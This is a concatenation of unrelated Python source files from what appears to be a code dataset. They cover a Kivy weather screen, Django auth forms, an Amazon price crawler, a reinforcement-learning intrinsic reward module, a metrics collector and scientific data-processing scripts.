                Line(points=(3*col_sp*moon_pct, y_list[3] - row_sp/2 + row_sp/8, 3*col_sp*moon_pct, y_list[3] - row_sp/2 - row_sp/8), width=1.5)
            Color(1, 1, 1)  # reset draw colour for the remaining textures
            Rectangle(pos=(x_list[4] - col_sp/4, y_list[3] + row_sp/4 - 10), texture=self.l.texture, size=self.l.texture.size)
            Rectangle(pos=(x_list[4] - col_sp/4, y_list[3] - row_sp/2 - 10), texture=self.m.texture, size=self.m.texture.size)
            # Forecast strip: one column per day (index 0 is today and is skipped).
            for i in range(1, len(self.day_list)):
                Rectangle(pos=(col_sp/32 + 1*col_sp*(i-1), y_list[1] + row_sp/6), texture=self.day_list[i].texture, size=self.day_list[i].texture.size)
                Rectangle(pos=(col_sp/32 + 1*col_sp*(i-1), y_list[1] - row_sp/4), texture=self.high_list[i].texture, size=self.high_list[i].texture.size)
                Rectangle(pos=(col_sp/32 + 1*col_sp*(i-1), y_list[1] - row_sp/4 - self.low_list[i].texture.size[1]), texture=self.low_list[i].texture, size=self.low_list[i].texture.size)
                Rectangle(pos=(col_sp/32 + 1*col_sp*(i-1), y_list[1] - row_sp/4 - self.low_list[i].texture.size[1]*2), texture=self.pop_list[i].texture, size=self.pop_list[i].texture.size)
            # Kept as attributes so dynamic_draw() can update them every frame.
            self.date_rect = Rectangle(pos=(x_list[3] + col_sp/2, y_list[1] + row_sp/6), texture=self.n.texture, size=self.n.texture.size)
            self.time_rect = Rectangle(pos=(self.date_rect.pos[0] + (self.n.texture.size[0] - self.o.texture.size[0])/2, y_list[1] - self.o.texture.size[1]), texture=self.o.texture, size=self.o.texture.size)
def dynamic_draw(self):
self.date_rect.texture = self.n.texture
self.date_rect.size = self.n.texture.size
self.time_rect.texture = self.o.texture
self.time_rect.size = self.o.texture.size
    def update(self, new_input, input_list):
        # Per-frame entry point driven by the screen manager.
        # Returns [1, 'menu'] to request a screen change, [0, 'weather'] to stay.
        if not self.error:
            self.get_time_date()
            print('A')  # NOTE(review): A/B/C look like leftover debug prints
            if self.logged_data:
                if self.call_draw:
                    # First frame after the data arrived: lay out the static canvas once.
                    self.static_draw(new_input, input_list)
                    self.call_draw = False
                # Only the clock/date rectangles change between frames.
                self.dynamic_draw()
            if self.new_screen:
                print('B')
                # First visit to this screen: fetch weather/astronomy data.
                self.get_data()
                self.logged_data = True
                self.new_screen = False
        else:
            # A previous fetch failed; show the failure message instead of data.
            self.add_widget(Label(text='Failed to Fetch Data'))
            print('C')
        if new_input:
            if input_list[3] == 1:
                # Exit button pressed: reset state so data is re-fetched on the
                # next visit, then hand control back to the menu screen.
                self.logged_data = False
                self.new_screen = True
                self.call_draw = True
                print('end weather update')
                return [1, 'menu']
        print('end weather update')
        return [0, 'weather']
|
13,147 | 0760d755324239ff91e19d977cd31cf3a07e9fd8 | import yaml
from datetime import datetime
from pymongo import MongoClient
from utils import config
# read configuration
cfg = config()
# open DB connection
mongo = MongoClient(cfg['mongo']['host'], cfg['mongo']['port'])
db = mongo.teryt
# functions to manipulate county collection
# functions to manipulate county collection
class CountyDAO:
    """Data-access helpers for the ``county`` Mongo collection."""

    def find_all(self):
        """Return every county as a list of {id, name, href} dicts."""
        return [
            {'id': doc['id'], 'name': doc['name'], 'href': 'asdasdasda'}
            for doc in db.county.find()
        ]

    def save(self, id, name, timestamp):
        """Insert one county; ``timestamp`` is an ISO date string (YYYY-MM-DD)."""
        document = {
            "id" : id,
            "name" : name,
            "timestamp": datetime.strptime(timestamp, "%Y-%m-%d")
        }
        return db.county.insert_one(document)

    def truncate(self):
        """Drop the entire collection."""
        db.county.drop()
13,148 | bffe76b7a517791aadfd3b12104500189f472a2d | __author__ = 'tomislav'
from celery.decorators import periodic_task,task
from .amazon_api import ProductAdvertisingAPI
from .models import Settings
from datetime import timedelta,datetime
import logging
import requests
import lxml.html
import re
from .models import Item
class Parser:
    """Turns an HTTP response body into an lxml document tree."""

    def __call__(self, *args, **kwargs):
        # args[0] is expected to be a requests.Response-like object.
        response = args[0]
        return lxml.html.fromstring(response.text)

    @staticmethod
    def get_price_value(price_string):
        """Extract the first price-looking number from text; float or None.

        Commas are treated as decimal separators (European price formats).
        """
        normalized = price_string.replace(",", ".")
        match = re.search('[^\d]*([\d]+(\.\d\d)?).*', normalized)
        return float(match.group(1)) if match else None
class AmazonCrawler:
    """Scrapes an Amazon product page for its title and current price."""

    # Shared session so cookies/keep-alive persist across items.
    session = requests.session()

    def extract_price(self, sel, item):
        """Return the product price as a float, or None when not found.

        Prefers the deal price span and falls back to the regular price span.
        """
        price = sel.xpath("//span[@id='priceblock_dealprice']")
        if not price:
            price = sel.xpath("//span[@id='priceblock_ourprice']")
        if price:
            price = Parser.get_price_value(price[0].text)
        if not price:
            # No price node, or its text was unparseable: log and give up.
            # (The old code dropped into ipdb.set_trace() here, which would
            # hang the crawler in production.)
            logging.error("no price found for url={}".format(item.url))
            return None
        return price

    def extract_name(self, sel, item):
        """Return the product title text, or None when the node is missing."""
        name = sel.xpath("//span[@id='productTitle']")
        if name:
            return name[0].text
        else:
            logging.error("no name found for url={}".format(item.url))
            return None

    def parse(self, item):
        """Fetch ``item.url``, extract name/price and store them on the item."""
        parser = Parser()
        sel = parser(self.session.get(item.url))
        price = self.extract_price(sel, item)
        name = self.extract_name(sel, item)
        item.name = name
        item.update_price(price)
class AmazonAPICrawler(ProductAdvertisingAPI):
    """Looks an item up through the Product Advertising API instead of scraping."""

    def get_asin_from_url(self, url):
        """Return the ASIN embedded in an Amazon product URL (…/dp/ASIN), or None."""
        asin = re.findall("\/dp\/([A-Z0-9]+)", url)
        if asin:
            return asin[0]
        else:
            return None

    def parse(self, id, crawler):
        """Resolve the Item's title/price via the API and persist them.

        The stored ``Item.url`` may be either a full product URL or a bare ASIN.
        """
        i = Item.query.filter_by(id=id).one()
        asin_from_url = self.get_asin_from_url(i.url)
        # The old code evaluated ``"http" not in asin_from_url`` which raised
        # TypeError whenever the regex found nothing (asin_from_url is None).
        if asin_from_url is not None:
            asin = asin_from_url
        elif "http" not in i.url:
            # Not a URL at all: treat the stored value as a bare ASIN.
            asin = i.url
        else:
            asin = None
        if asin:
            pd = self.item_lookup([asin])
            if pd:
                i.name = pd[asin]['title']
                i.update_price(pd[asin]['price'])
        else:
            # Sentinel values mark the item as unresolvable in the listing.
            i.name = "wrong url or asin"
            i.update_price(-1)
def call_amazon_api_task(i):
    """Run the API crawler synchronously for a single Item."""
    api_crawler = AmazonAPICrawler()
    api_crawler.parse(i.id, api_crawler)
@periodic_task(run_every=timedelta(seconds=5))
def check_database_for_new_items():
    """Pick one item that still lacks a price and fetch its data.

    Items with ``new_price == 0`` take priority over those with ``old_price == 0``.
    """
    item = (Item.query.filter_by(new_price=0).first()
            or Item.query.filter_by(old_price=0).first())
    if item:
        call_amazon_api_task(item)
@periodic_task(run_every=timedelta(seconds=5))
def update_listing():
    """Refresh the price of the most stale item (not updated for 5+ minutes)."""
    since = datetime.now() - timedelta(minutes=5)
    i = Item.query.filter(Item.updated<since).first()
    # .first() returns None when every item is fresh; the old code then crashed
    # with AttributeError (``i.id`` on None) inside call_amazon_api_task.
    if i is not None:
        call_amazon_api_task(i)
@periodic_task(run_every=timedelta(seconds=5))
def send_email():
    # Notify about items whose price moved by more than the configured percent.
    # Runs every 5 seconds; items already notified (email_notify == 1) are skipped.
    import smtplib
    # The most recently saved settings row wins.
    pd = Settings.query.all()[-1]
    items = Item.query.filter_by(email_notify=0)
    fromaddr = 'no-reply@162.243.60.11'
    toaddrs = pd.Send_to
    if items:
        # NOTE(review): ``items`` is a query object, which is always truthy —
        # this guard never filters anything; confirm the intended check.
        if pd.Percent.isdigit():
            percent = int(pd.Percent)
        else:
            # Fall back to 5% when the setting is not a plain number.
            percent = 5
        msg ="Hello,\n"
        for i in items:
            if abs(i.percent)>percent:
                msg += 'Item {} has changed his price from {} to {}. \n'.format(i.url,i.old_price,i.new_price)
                # Mark as notified so the item is not reported again.
                i.email_notify = 1
                i.update_all()
        if msg!="Hello,\n":
            # Only open an SMTP connection when at least one item crossed the threshold.
            server = smtplib.SMTP('localhost')
            server.ehlo()
            server.sendmail(fromaddr, toaddrs, msg)
            server.quit()
13,149 | cd380f18c7d47aab90558f7754cf8554445a534b | import random
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import sys
sys.path.append(".")
from ..intrinsic_reward import IntrinsicReward
from .model import RNDNetwork
class RND(IntrinsicReward):
    """
    Random Network Distillation (RND) class
    Paper:
    Burda, Y., Edwards, H., Storkey, A., & Klimov, O. (2018).
    Exploration by random network distillation.
    arXiv preprint arXiv:1810.12894.
    Link: https://arxiv.org/abs/1810.12894
    """

    def __init__(
        self, state_size, action_size, hidden_dim=128, state_rep_size=64, learning_rate=1e-5, eta=2
    ):
        """
        Initialise parameters for MARL training
        :param state_size: dimension of state input
        :param action_size: dimension of action input
        :param hidden_dim: hidden dimension of networks
        :param state_rep_size: dimension of state representation in network
        :param learning_rate: learning rate for ICM parameter optimisation
        :param eta: curiosity loss weighting factor
        """
        super(RND, self).__init__(state_size, action_size, eta)
        self.hidden_dim = hidden_dim
        self.state_rep_size = state_rep_size
        self.learning_rate = learning_rate
        # Track which device each network currently lives on so they are only
        # moved when the caller's use_cuda flag changes.
        self.predictor_dev = "cpu"
        self.target_dev = "cpu"
        # create models: the predictor is trained to match a fixed, randomly
        # initialised target network; its prediction error is the novelty signal.
        self.predictor_model = RNDNetwork(state_size, action_size, hidden_dim, state_rep_size)
        self.target_model = RNDNetwork(state_size, action_size, hidden_dim, state_rep_size)
        for param in self.target_model.parameters():
            # The target network stays frozen for the whole run (random features).
            param.requires_grad = False
        self.optimizer = optim.Adam(self.predictor_model.parameters(), lr=learning_rate)
        # Last forward (prediction) loss, kept so get_losses() can report it.
        self.loss = None

    def compute_intrinsic_reward(self, state, action, next_state, use_cuda, train=False):
        """
        Compute intrinsic reward for given input
        :param state: (batch of) current state(s) — not used by RND, kept for
            the shared IntrinsicReward interface
        :param action: (batch of) applied action(s) — not used by RND
        :param next_state: (batch of) next/reached state(s)
        :param use_cuda: use CUDA tensors
        :param train: flag if model should be trained
        :return: (batch of) intrinsic reward(s)
        """
        if use_cuda:
            fn = lambda x: x.cuda()
            device = "gpu"  # internal tag only, not a torch device string
        else:
            fn = lambda x: x.cpu()
            device = "cpu"
        # Move the networks only when the requested device actually changed.
        if not self.predictor_dev == device:
            self.predictor_model = fn(self.predictor_model)
            self.predictor_dev = device
        if not self.target_dev == device:
            self.target_model = fn(self.target_model)
            self.target_dev = device
        target_feature = self.target_model(next_state)
        predict_feature = self.predictor_model(next_state)
        # Squared feature-prediction error, summed over features, mean over batch.
        forward_loss = ((target_feature - predict_feature) ** 2).sum(-1).mean()
        self.loss = forward_loss
        if train:
            self.optimizer.zero_grad()
            self.loss.backward(retain_graph=True)
            # Clip gradients for training stability.
            torch.nn.utils.clip_grad_norm_(self.predictor_model.parameters(), 0.5)
            self.optimizer.step()
        return self.eta * forward_loss

    def get_losses(self):
        """
        Get losses of last computation if existing
        :return: list of (batch of) loss(es)
        """
        if self.loss is not None:
            return [self.loss]
        else:
            return []
13,150 | 5e7394292d276d30ea61260b19aea4cbd2fec09c | import torch
from laplace_v3.func_lib import yorick_delta_relu_sq
x = torch.tensor(0.5, requires_grad=True)
y = yorick_delta_relu_sq(x)
y.backward()
print(x.grad)
x = torch.tensor(2., requires_grad=True)
y = yorick_delta_relu_sq(x)
y.backward()
print(x.grad)
x = torch.tensor(0., requires_grad=True)
y = yorick_delta_relu_sq(x)
y.backward()
print(x.grad)
x = torch.tensor(1., requires_grad=True)
y = yorick_delta_relu_sq(x)
y.backward()
print(x.grad)
|
13,151 | beb2c324874fd2c1425818342c955ab481f33d17 | from django import forms
from django.contrib.auth.models import User
from django.contrib.auth import authenticate
from django.utils.translation import ugettext_lazy as _
class LoginForm(forms.Form):
    """
    A form for logging in users.

    Validation only rejects accounts that exist but are not yet confirmed;
    unknown e-mails pass through (see the commented-out error below), so the
    view can fail authentication without revealing which addresses exist.
    """
    email = forms.EmailField(label="E-mail", help_text = "Required",
        required=True,
        widget=forms.TextInput(attrs={'class':'form-control special-form-control'}))
    password = forms.CharField(label="Password", help_text = "Required",
        required=True,
        widget=forms.PasswordInput(attrs={'class':'form-control special-form-control'}))

    def clean_email(self):
        """
        Checks that the email has a User object associated with it
        and that the User object is active
        """
        e = self.cleaned_data['email']
        try:
            user = User.objects.get(email=e)
            if not user.is_active:
                msg = 'This user account has not been confirmed yet'
                raise forms.ValidationError(msg)
        except User.DoesNotExist:
            # Unknown e-mails are deliberately not flagged here.
            pass
            # msg = 'This email is not associated with an account'
            # raise forms.ValidationError(msg)
        return e

    def get_username(self):
        """
        Returns the username for this form's e-mail, or None when the form
        is invalid or no matching User exists.
        """
        if not self.is_valid():
            return None
        try:
            # NOTE: all emails stored in lower-case
            email = self.clean_email().lower()
            return User.objects.get(email=email).username
        except User.DoesNotExist:
            pass
        return None
class SignupForm(forms.Form):
    """
    A form for signing up users.

    create_user() builds an *inactive* User (activated later via e-mail
    confirmation) with a generated ``user<N>`` username.
    """
    email = forms.EmailField(label="E-mail", help_text = "Required",
        required=True,
        widget=forms.TextInput(attrs={'class':'form-control special-form-control'}))
    password1 = forms.CharField(label="Password", help_text = "Required",
        required=True,
        widget=forms.PasswordInput(attrs={'class':'form-control special-form-control'}))
    password2 = forms.CharField(label="Password confirmation", help_text = "Required",
        required=True,
        widget=forms.PasswordInput(attrs={'class':'form-control special-form-control'}))

    def clean_email(self):
        """
        Checks that the email is not already in use
        """
        # NOTE: all emails are stored in lower case
        e = self.cleaned_data['email'].lower()
        if User.objects.filter(email=e).count() > 0:
            raise forms.ValidationError('An existing account is using that email address.')
        return e

    def clean_password2(self):
        """
        Checks that the passwords are the same
        """
        password1 = self.cleaned_data.get('password1', '')
        password2 = self.cleaned_data['password2']
        if password1 != password2:
            raise forms.ValidationError('The passwords did not match.')
        return password2

    def create_user(self):
        """
        Creates an inactive User object, or returns None if the form is invalid.
        """
        if not self.is_valid():
            return None
        # generate a username from max(id) + 1.
        # NOTE(review): this is race-prone under concurrent signups (two
        # requests can compute the same id) — consider a DB-side default.
        ids = User.objects.values_list('id', flat=True).order_by('-id')[:1]
        if len(ids) > 0:
            # ids[0] will be the maximum value (due to order_by: '-id')
            idnum = ids[0] + 1
        else:
            idnum = 1
        # create User object
        username = "user%s" % idnum
        # NOTE: store email in lower case
        email = self.clean_email().lower()
        password = self.clean_password2()
        # 'tmp' is a placeholder; the real (hashed) password is set just below
        # via set_password().
        user = User(username=username, email=email, password='tmp')
        user.save()
        # set the real password
        user.set_password(password)
        # make user inactive (until user has confirmed account)
        user.is_active = False
        # update
        user.save()
        return user
class ChangePasswordForm(forms.Form):
    """
    A form for changing a user's password (new password entered twice).
    """
    password1 = forms.CharField(label="Password", help_text = "Required",
        required=True,
        widget=forms.PasswordInput(attrs={'class':'form-control special-form-control'}))
    password2 = forms.CharField(label="Password confirmation", help_text = "Required",
        required=True,
        widget=forms.PasswordInput(attrs={'class':'form-control special-form-control'}))

    def clean_password2(self):
        """
        Checks that the passwords are the same
        """
        password1 = self.cleaned_data.get('password1', '')
        password2 = self.cleaned_data['password2']
        if password1 != password2:
            raise forms.ValidationError('The passwords did not match.')
        return password2

    def change_password(self, user):
        """
        Sets the validated password on ``user`` and saves it.
        Returns the user, or None when the form is invalid.
        """
        if not self.is_valid():
            return None
        password = self.clean_password2()
        user.set_password(password)
        user.save()
        return user
class ResetPasswordForm(forms.Form):
    """
    A form for resetting a password.

    Unlike LoginForm, this form *does* reveal whether the e-mail is registered
    (it raises a validation error for unknown addresses).
    """
    email = forms.EmailField(label="E-mail", help_text = "Required",
        required=True,
        widget=forms.TextInput(attrs={'class':'form-control special-form-control'}))

    def clean_email(self):
        """
        Checks that the email belongs to an existing, confirmed account.
        """
        # NOTE: all emails are stored in lower-case
        e = self.cleaned_data['email'].lower()
        try:
            user = User.objects.get(email=e)
            if not user.is_active:
                msg = 'This user account has not been confirmed yet'
                raise forms.ValidationError(msg)
        except User.DoesNotExist:
            msg = 'This email is not associated with an account'
            raise forms.ValidationError(msg)
        return e

    def get_user(self):
        """
        Returns the User object for the email address
        """
        if not self.is_valid():
            return None
        # error checking done in: clean_email
        # NOTE: all emails are stored in lower-case
        e = self.clean_email().lower()
        return User.objects.get(email=e)
13,152 | 8d704ccbd467dbec1a67f1b1f53069eea4dd75bc | # coding=utf-8
"""
Collect [Yammer Metrics](http://metrics.codahale.com/) metrics via HTTP
#### Dependencies
* urlib2
"""
import urllib2
try:
import json
json # workaround for pyflakes issue #13
except ImportError:
import simplejson as json
import diamond.collector
class YammerCollector(diamond.collector.Collector):
def get_default_config_help(self):
config_help = super(YammerCollector,
self).get_default_config_help()
config_help.update({
'url': 'URL from which to pull metrics',
'username': 'Username if basic auth is required',
'password': 'Password is basic auth is required',
})
return config_help
def get_default_config(self):
"""
Returns the default collector settings
"""
config = super(YammerCollector, self).get_default_config()
config.update({
'path': 'yammer',
'url': 'http://127.0.0.1:8081/metrics',
'username': '',
'password': '',
})
return config
def collect(self):
if json is None:
self.log.error('Unable to import json')
return {}
try:
if self.config['username']:
passman = urllib2.HTTPPasswordMgrWithDefaultRealm()
passman.add_password(None, self.config['url'], self.config['username'], self.config['password'])
urllib2.install_opener(urllib2.build_opener(urllib2.HTTPBasicAuthHandler(passman)))
response = urllib2.urlopen(self.config['url'])
except urllib2.HTTPError, err:
self.log.error("%s: %s", url, err)
return
try:
result = json.load(response)
except (TypeError, ValueError):
self.log.error("Unable to parse response from elasticsearch as a"
+ " json object")
return
metrics = {}
for k, v in result.items():
k = self._sanitize(k)
metrics.update(self._parseMetrics(k,v))
for key in metrics:
self.publish(key, metrics[key])
def _sanitize(self, name):
return name.replace(' ','_').replace('.','_').replace('-','_')
def _flatten(self,di):
stack = [('',di)]
while stack:
e = stack[-1]
for k, v in e[1].items():
if e[0]:
name = e[0] + '.' + self._sanitize(k)
else:
name = self._sanitize(k)
if isinstance(v, dict):
stack.append((name,v))
else:
yield name, v
stack.remove(e)
def _parseMetrics(self,prefix,raw_metrics):
metrics = {}
for k, v in self._flatten(raw_metrics):
if isinstance(v,int) or isinstance(v,float):
metrics[prefix + '.' + k] = v
return metrics
|
13,153 | 906ad4c55ebd258564f3663f69659f6eab7ce429 | # -*- coding: utf-8 -*-
# Generated by Django 1.11.6 on 2017-12-07 00:16
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated by Django's makemigrations; prefer editing the models and
    # regenerating over hand-editing this file.

    dependencies = [
        ('mainpage', '0001_initial'),
    ]

    operations = [
        # Order the "right now" goods by their explicit sort_index field.
        migrations.AlterModelOptions(
            name='goodsrapid',
            options={'ordering': ['sort_index'], 'verbose_name': 'Товар "Прямо сейчас"', 'verbose_name_plural': 'Товары "Прямо сейчас"'},
        ),
        # Relabel/retype the "about us" text field.
        migrations.AlterField(
            model_name='mainaboutus',
            name='text_item',
            field=models.TextField(max_length=128, verbose_name='Текст "О нас"'),
        ),
    ]
13,154 | 9c898cd115dc27f8f06bc940ddec7ca4bce929e8 | from src import predict
from src import data
from src import neon_paths
from glob import glob
import geopandas as gpd
import traceback
from src.start_cluster import start
from src.models import multi_stage
from distributed import wait
import os
import re
from pytorch_lightning.loggers import CometLogger
from pytorch_lightning import Trainer
def find_rgb_files(site, config, year="2021",
                   bounds=(399815.5, 409113.7, 3282308, 3290124)):
    """Return RGB tile paths for ``site``/``year`` inside a station boundary.

    Parameters
    ----------
    site: NEON site code that must appear in the tile path (e.g. "OSBS").
    config: dict with an ``rgb_sensor_pool`` glob pattern.
    year: acquisition year that must appear as a path component.
    bounds: (easting_min, easting_max, northing_min, northing_max) in the tile
        CRS.  Defaults to the OSBS station boundary that was previously
        hard-coded, so existing callers are unaffected.

    Returns
    -------
    list of tile paths whose embedded coordinates fall strictly inside bounds.
    """
    easting_min, easting_max, northing_min, northing_max = bounds
    tiles = glob(config["rgb_sensor_pool"], recursive=True)
    tiles = [x for x in tiles if site in x]
    tiles = [x for x in tiles if "neon-aop-products" not in x]
    tiles = [x for x in tiles if "/{}/".format(year) in x]
    #Only allow tiles that are within the station boundary
    selected_tiles = []
    for rgb_path in tiles:
        basename = os.path.basename(rgb_path)
        # Tile names embed the UTM coordinates as "<easting>_<northing>_image".
        geo_index = re.search("(\d+_\d+)_image", basename).group(1)
        easting, northing = (float(v) for v in geo_index.split("_"))
        # Strict inequalities preserved from the original bounds check.
        if easting_min < easting < easting_max and northing_min < northing < northing_max:
            selected_tiles.append(rgb_path)
    return selected_tiles
def convert(rgb_path, hyperspectral_pool, savedir):
    """Convert the .h5 hyperspectral tiles matching an RGB tile into GeoTIFFs.

    :param rgb_path: path of the RGB tile whose geo index selects the .h5 files
    :param hyperspectral_pool: candidate .h5 paths to match against
    :param savedir: directory where the converted .tif files are written
    :return: list of per-year .tif paths (existing files are reused, not rebuilt)
    """
    #convert .h5 hyperspec tile if needed
    basename = os.path.basename(rgb_path)
    # The "easting_northing" geo index links the RGB tile to its .h5 tiles.
    geo_index = re.search("(\d+_\d+)_image", basename).group(1)
    h5_list = [x for x in hyperspectral_pool if geo_index in x]
    tif_paths = []
    for path in h5_list:
        # NOTE(review): assumes the acquisition year is the 7th path component —
        # confirm against the NEON directory layout before reusing elsewhere.
        year = path.split("/")[6]
        tif_basename = os.path.splitext(os.path.basename(rgb_path))[0] + "_hyperspectral_{}.tif".format(year)
        tif_path = "{}/{}".format(savedir, tif_basename)
        if not os.path.exists(tif_path):
            tif_paths.append(neon_paths.convert_h5(path, rgb_path, savedir, year=year))
        else:
            # Conversion already done on a previous run; reuse the file.
            tif_paths.append(tif_path)
    return tif_paths
#Params
config = data.read_config("config.yml")
config["preload_images"] = False
comet_logger = CometLogger(project_name="DeepTreeAttention2", workspace=config["comet_workspace"], auto_output_logging="simple")
comet_logger.experiment.add_tag("prediction")
comet_logger.experiment.log_parameters(config)
cpu_client = start(cpus=1, mem_size="10GB")
dead_model_path = "/orange/idtrees-collab/DeepTreeAttention/Dead/snapshots/c4945ae57f4145948531a0059ebd023c.pl"
config["crop_dir"] = "/blue/ewhite/b.weinstein/DeepTreeAttention/67ec871c49cf472c8e1ae70b185addb1"
savedir = config["crop_dir"]
species_model_paths = ["/blue/ewhite/b.weinstein/DeepTreeAttention/snapshots/71f8ba53af2b46049906554457cd5429.pt",
"/blue/ewhite/b.weinstein/DeepTreeAttention/snapshots/ac7b4194811c4bdd9291892bccc4e661.pt",
"/blue/ewhite/b.weinstein/DeepTreeAttention/snapshots/b629e5365a104320bcec03843e9dd6fd.pt",
"/blue/ewhite/b.weinstein/DeepTreeAttention/snapshots/5ac9afabe3f6402a9c312ba4cee5160a.pt",
"/blue/ewhite/b.weinstein/DeepTreeAttention/snapshots/46aff76fe2974b72a5d001c555d7c03a.pt",
"/blue/ewhite/b.weinstein/DeepTreeAttention/snapshots/63bdab99d6874f038212ac301439e9cc.pt",
"/blue/ewhite/b.weinstein/DeepTreeAttention/snapshots/c871ed25dc1c4a3e97cf3b723cf88bb6.pt",
"/blue/ewhite/b.weinstein/DeepTreeAttention/snapshots/6d45510824d6442c987b500a156b77d6.pt",
"/blue/ewhite/b.weinstein/DeepTreeAttention/snapshots/83f6ede4f90b44ebac6c1ac271ea0939.pt",
"/blue/ewhite/b.weinstein/DeepTreeAttention/snapshots/47ee5858b1104214be178389c13bd025.pt",
"/blue/ewhite/b.weinstein/DeepTreeAttention/snapshots/1ccdc11bdb9a4ae897377e3e97ce88b9.pt",
"/blue/ewhite/b.weinstein/DeepTreeAttention/snapshots/3c7b7fe01eaa4d1b8a1187b792b8de40.pt",
"/blue/ewhite/b.weinstein/DeepTreeAttention/snapshots/3b6d9f2367584b3691de2c2beec47beb.pt",
"/blue/ewhite/b.weinstein/DeepTreeAttention/snapshots/509ef67c6050471e83199d2e9f4f3f6a.pt",
"/blue/ewhite/b.weinstein/DeepTreeAttention/snapshots/ae7abdd50de04bc9970295920f0b9603.pt",
"/blue/ewhite/b.weinstein/DeepTreeAttention/snapshots/d2180f54487b45269c1d86398d7f0fb8.pt",
"/blue/ewhite/b.weinstein/DeepTreeAttention/snapshots/6f9730cbe9ba4541816f32f297b536cd.pt",
"/blue/ewhite/b.weinstein/DeepTreeAttention/snapshots/71f8ba53af2b46049906554457cd5429.pt",
"/blue/ewhite/b.weinstein/DeepTreeAttention/snapshots/6a28224a2dba4e4eb7f528d19444ec4e.pt",
"/blue/ewhite/b.weinstein/DeepTreeAttention/snapshots/b9c0111b1dc0420b84e3b6b79da4e166.pt"]
#generate HSI_tif data if needed.
h5_pool = glob(config["HSI_sensor_pool"], recursive=True)
h5_pool = [x for x in h5_pool if not "neon-aop-products" in x]
hyperspectral_pool = glob(config["HSI_tif_dir"]+"*")
### Step 1 Find RGB Tiles and convert HSI
tiles = find_rgb_files(site="OSBS", config=config)
#tif_futures = cpu_client.map(
#convert,
#tiles,
#hyperspectral_pool=h5_pool,
#savedir=config["HSI_tif_dir"])
#wait(tif_futures)
for x in tiles:
basename = os.path.splitext(os.path.basename(x))[0]
shpname = "/blue/ewhite/b.weinstein/DeepTreeAttention/results/crowns/{}.shp".format(basename)
if not os.path.exists(shpname):
try:
crowns = predict.find_crowns(rgb_path=x, config=config, dead_model_path=dead_model_path)
crowns.to_file(shpname)
except Exception as e:
traceback.print_exc()
print("{} failed to build crowns with {}".format(shpname, e))
continue
crown_annotations_paths = []
crown_annotations_futures = []
for x in tiles:
basename = os.path.splitext(os.path.basename(x))[0]
shpname = "/blue/ewhite/b.weinstein/DeepTreeAttention/results/crowns/{}.shp".format(basename)
try:
crowns = gpd.read_file(shpname)
except:
continue
if not os.path.exists("/blue/ewhite/b.weinstein/DeepTreeAttention/results/crops/{}.shp".format(basename)):
written_file = predict.generate_prediction_crops(crowns, config, as_numpy=True, client=cpu_client)
crown_annotations_paths.append(written_file)
else:
crown_annotations_path = "/blue/ewhite/b.weinstein/DeepTreeAttention/results/crops/{}.shp".format(basename)
crown_annotations_paths.append(crown_annotations_path)
#Recursive predict to avoid prediction levels that will be later ignored.
trainer = Trainer(gpus=config["gpus"], logger=False, enable_checkpointing=False)
## Step 2 - Predict Crowns
for species_model_path in species_model_paths:
print(species_model_path)
# Load species model
#Do not preload weights
config["pretrained_state_dict"] = None
m = multi_stage.MultiStage.load_from_checkpoint(species_model_path, config=config)
prediction_dir = os.path.join("/blue/ewhite/b.weinstein/DeepTreeAttention/results/",
os.path.splitext(os.path.basename(species_model_path))[0])
try:
os.mkdir(prediction_dir)
except:
pass
for x in crown_annotations_paths:
results_shp = os.path.join(prediction_dir, os.path.basename(x))
if not os.path.exists(results_shp):
print(x)
try:
predict.predict_tile(
crown_annotations=x,
filter_dead=True,
trainer=trainer,
m=m,
savedir=prediction_dir,
config=config)
except Exception as e:
traceback.print_exc()
continue
|
13,155 | 2d93f3de6f5304003ad46b36e10d26aa3e0bf596 | ##coding = utf -8
## The script is mainly for mining all the inserted TEs in nested TE sequences !!
Emmer_dir='/home/lab706/jerryliu/Agenome_project/output_RM_Emmer/formated_TE/'
CS_dir='/home/lab706/jerryliu/Agenome_project/CS_format_conversion/formated_TE/'
Tu_dir='/home/lab706/jerryliu/Agenome_project/Tu_format_conversion/formated_TE/'
file_tag=['chr1A','chr2A','chr3A','chr4A','chr5A'\
,'chr6A','chr7A','chrUn']
def getnu(string):
    """Sort key: the start coordinate of an (id, (start, end)) record."""
    ## record shape: [ ( id,(start,end)), ...]
    start, _end = string[1]
    return int(start)
## change the [strat : end ] in the string into '1'.
## change the [start : end] span of the mask into '1'.
def change(string, START, END, start, end):
    """Mark positions start..end (absolute coords; mask anchored at START) with '1'.

    The mask ``string`` covers START..END inclusive; characters outside the
    span are kept unchanged.
    """
    filled = (end - start + 1) * '1'
    prefix = string[:(start - START)]
    suffix = string[(end - START + 1):]
    return prefix + filled + suffix
def getnumber(string):
    """Sort key: the leading start coordinate of a '123..234' range string."""
    head, _, _tail = string.partition('..')
    return int(head)
def getIDnum(string):
    """Sort key: the numeric prefix of an id like '123_Tu'."""
    return int(string.partition('_')[0])
## transform the number string into positon pairs
def transform(string, START,END):
list_1=[]
i=0
point='off'
for bp in string:
if bp == '0' and point =='off':
start=START+i
i+= 1
point = 'ON'
elif bp =='0' and point == 'ON' and i != (END - START ):
i+= 1
elif bp =='0' and point =='ON' and i == (END - START):
end=START +i
list_1.append((start, end))
elif bp =='1' and point == 'ON':
end=START + i -1
point= 'off'
list_1.append((start, end))
i+=1
elif bp =='1' and point =='off':
i+= 1
return list_1
### [(1, 33), (99, 100)]
spe_list=[]
for tag in file_tag:
input_file=open(Emmer_dir+'Emmer_'+tag+'_TE.formated','r')
##step 1: generate the nested and single TE dict. sepe_dict={
## /id="1_Tu1" /post="RLG_famc1.5 /status="fragmented" C : (1,4284)
sepe_dict={}
for num, line in enumerate(input_file):
line=line.strip().split('\t')
id=str(num)+'_Emmer'
line[1] = id
pos_list=[]
for pair in line[-1].split(','):
try:
start=int(pair.split('..')[0])
end=int(pair.split('..')[1])
except:
print('error pair !')
else:
pos_list.append(start)
pos_list.append(end)
try:
START=min(pos_list)
END=max(pos_list)
except:
print('empty pos_list')
else:
position_array=(START,END)
name='\t'.join(line[0:5])
if name not in sepe_dict.keys():
sepe_dict[name] = position_array
input_file.close()
print(len(sepe_dict))
##step 2: generate the nested TE dict. nested_dict={
## 'chr1A\t21055_Tu\t/post="RLG_famc13\t/status="fragmented"\tC' : { id:(xx,xx), id:(xx,xx),
## id:(xx,xx), ...} , ID:{...}, ...}
# NOTE(review): relies on sepe_dict / getnu / change / transform / getnumber
